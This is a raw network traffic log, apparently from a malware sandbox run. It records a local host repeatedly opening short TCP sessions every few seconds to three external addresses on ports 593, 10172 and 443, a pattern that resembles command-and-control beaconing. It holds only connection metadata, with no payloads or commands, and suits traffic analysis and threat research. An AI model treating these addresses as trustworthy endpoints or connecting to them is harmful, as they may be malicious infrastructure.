Dec 31, 2021 09:53:17.773329020 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.773441076 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:17.965396881 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:17.967917919 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:17.968276024 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:18.433850050 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:18.433876038 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:18.434072971 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:18.434103966 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:18.436180115 CET	49853	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:18.552273035 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.580898046 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.580996990 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.581906080 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.610423088 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.610754967 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.610831976 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.612068892 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.616359949 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.616482973 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.630712032 CET	593	49853	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:18.645513058 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.645533085 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.685395956 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.756891966 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.756932020 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.756995916 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.757030964 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.759159088 CET	49859	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:18.787863970 CET	10172	49859	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:18.874703884 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:18.874761105 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:18.874972105 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:18.875674009 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:18.875705957 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:19.431416035 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:19.431607962 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:19.432362080 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:19.432380915 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:19.438334942 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:19.438360929 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:19.438448906 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:19.438461065 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:20.246491909 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:20.246577978 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:20.246613026 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:20.246637106 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:20.250035048 CET	49862	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:20.250077963 CET	443	49862	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:20.359405994 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.563417912 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.563548088 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.564316988 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.768286943 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.768448114 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.768529892 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.769418955 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.776230097 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.776477098 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:20.973371029 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.980266094 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.980477095 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:20.980495930 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:21.444909096 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:21.444931030 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:21.444984913 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:21.445036888 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:21.447124958 CET	49869	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:21.561182976 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.590079069 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.590219021 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.590945959 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.620439053 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.620461941 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.620563030 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.621330976 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.624458075 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.624557972 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.651220083 CET	593	49869	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:21.653377056 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.653402090 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.689635992 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.766560078 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.766580105 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.766661882 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.766696930 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.769563913 CET	49870	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:21.798305988 CET	10172	49870	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:21.889910936 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:21.889951944 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:21.890058994 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:21.890559912 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:21.890579939 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:22.524415016 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:22.525033951 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:22.525659084 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:22.525671005 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:22.530091047 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:22.530107021 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:22.530138016 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:22.530148983 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:23.382605076 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:23.382693052 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:23.382960081 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:23.386812925 CET	49871	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:23.386830091 CET	443	49871	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:23.563719034 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:23.855679035 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:23.855772972 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:23.856924057 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.149024010 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.149907112 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.149992943 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.150943041 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.157860994 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.158067942 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.442994118 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.450335979 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.450364113 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.918976068 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.919008970 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:24.919128895 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:24.922384977 CET	49872	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:25.031296968 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.060842991 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.063791990 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.064564943 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.093849897 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.094050884 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.094185114 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.094811916 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.099224091 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.099342108 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.128670931 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.128700972 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.165631056 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.214634895 CET	593	49872	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:25.239770889 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.239804029 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.239914894 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.244405985 CET	49873	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:25.273873091 CET	10172	49873	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:25.358799934 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:25.358851910 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:25.358997107 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:25.359486103 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:25.359503984 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.003614902 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.005078077 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.006155014 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.006162882 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.011827946 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.011845112 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.012195110 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.012214899 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.875533104 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.875611067 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:26.875643015 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.875673056 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.878881931 CET	49874	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:26.878907919 CET	443	49874	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:27.016411066 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.206872940 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.207005978 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.208115101 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.398340940 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.398770094 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.398911953 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.399542093 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.404124975 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.404237032 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:27.589894056 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.594423056 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.594497919 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:27.594660997 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:28.056390047 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:28.056420088 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:28.056531906 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:28.059520960 CET	49875	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:28.173540115 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.202265978 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.202364922 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.202975035 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.231646061 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.231786966 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.231873989 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.232465029 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.236808062 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.236915112 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.249794960 CET	593	49875	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:28.265496016 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.265526056 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.305382013 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.377116919 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.377146959 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.379267931 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.382544041 CET	49876	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:28.411238909 CET	10172	49876	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:28.499959946 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:28.500027895 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:28.500157118 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:28.500777006 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:28.500791073 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:29.150322914 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:29.150427103 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:29.151073933 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:29.151083946 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:29.157305956 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:29.157329082 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:29.157418013 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:29.157428026 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:30.227655888 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:30.227746964 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:30.227982998 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:30.232486963 CET	49877	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:30.232546091 CET	443	49877	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:30.344120026 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.539478064 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.539612055 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.540158033 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.736407995 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.736433029 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.736521959 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.736995935 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.739774942 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.739845037 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:30.931833982 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.934501886 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.934640884 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:30.934670925 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:31.402976990 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:31.403032064 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:31.403599024 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:31.405757904 CET	49878	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:31.515466928 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.544346094 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.544475079 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.545192003 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.574851990 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.574899912 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.575014114 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.575769901 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.579694986 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.579801083 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.600725889 CET	593	49878	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:31.608305931 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.608330011 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.608344078 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.721168995 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.721213102 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.724482059 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.727097988 CET	49879	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:31.770859957 CET	10172	49879	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:31.844288111 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:31.844347954 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:31.844464064 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:31.845208883 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:31.845227003 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:32.448066950 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:32.448229074 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:32.449264050 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:32.449281931 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:32.459213018 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:32.459228039 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:32.459394932 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:32.459407091 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:33.296724081 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:33.296787024 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:33.296788931 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:33.296863079 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:33.307665110 CET	49880	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:33.307701111 CET	443	49880	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:33.454422951 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.638601065 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:33.638741970 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.643001080 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.826821089 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:33.827202082 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:33.827302933 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.829765081 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.832696915 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:33.832874060 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:34.015312910 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.017438889 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.017477036 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.017672062 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.507975101 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.508007050 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.508218050 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:34.591849089 CET	49882	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:34.710166931 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.739298105 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.739464045 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.743277073 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.772316933 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.772814035 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.773451090 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.774847031 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.776000977 CET	593	49882	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:34.779221058 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.779341936 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.808289051 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.808314085 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.808326960 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.919213057 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.919254065 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:34.919378042 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.919425011 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.922662020 CET	49883	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:34.951739073 CET	10172	49883	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:35.032049894 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.032094002 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:35.032320976 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.032929897 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.032946110 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:35.588383913 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:35.588572025 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.726819992 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.726861954 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:35.730344057 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.730390072 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:35.730427027 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:35.730439901 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:36.533107996 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:36.533190012 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:36.533221960 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:36.533246040 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:36.535471916 CET	49884	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:36.535499096 CET	443	49884	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:36.641899109 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:36.836946011 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:36.837071896 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:36.837641954 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.032656908 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.032737970 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.032820940 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.033346891 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.037111998 CET	49885	593	192.168.2.7	103.70.29.126
